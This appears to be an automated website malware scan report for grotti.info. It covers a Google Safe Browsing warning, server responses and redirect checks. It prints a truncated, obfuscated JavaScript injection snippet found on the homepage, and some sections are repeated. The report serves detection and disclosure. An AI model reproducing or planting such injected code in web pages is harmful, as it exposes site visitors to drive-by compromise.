Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=grotti.info
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://grotti.info/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 08 Jan 2015 10:23:45 GMT Location: http://www.grotti.info/ Server: Apache Content-Length: 231 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.grotti.info/ | 200 OK Content-Length: 3191 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) njfzym="spl"+"i"+"t";huexek=window;xgkzlp=(1)?"0x":"123";oye=(5-3-1);try{--(document["b"+"ody"])}catch(zrly){ruj=false;try{}catch(mbljg){ruj=21;}
if(1){loe="0:0:60:5d:17:1f:5b:66:5a:6c:64:5c:65:6b:25:5e:5c:6b:3c:63:5c:64:5c:65:6b:6a:39:70:4b:58:5e:45:58:64:5c:1f:1e:59:66:5b:70:1e:20:52:27:54:20:72:4:0:0:0:60:5d:69:58:64:5c:69:1f:20:32:4:0:0:74:17:5c:63:6a:5c:17:72:4:0:0:0:5b:66:5a:6c:64:5c:65:6b:25:6e:69:60:6b:5c:1f:19:33:60:5d:69:58:64:5c:17:6a:69:5a:34:1e:5f:6b:6b:67:31:26:26:5b:60:6a:6b: Antivirus reports:
| ||
http://www.grotti.info/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: grotti.info
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 08 Jan 2015 10:23:45 GMT
Location: http://www.grotti.info/
Server: Apache
Content-Length: 231
Content-Type: text/html; charset=iso-8859-1
...231 bytes of data.
GET / HTTP/1.1
Host: grotti.info
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 08 Jan 2015 10:23:45 GMT
Location: http://www.grotti.info/
Server: Apache
Content-Length: 231
Content-Type: text/html; charset=iso-8859-1
...231 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: grotti.info
Referer: http://www.google.com/search?q=grotti.info
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: grotti.info
Referer: http://www.google.com/search?q=grotti.info
Result:
The result is similar to the first query. There are no suspicious redirects found.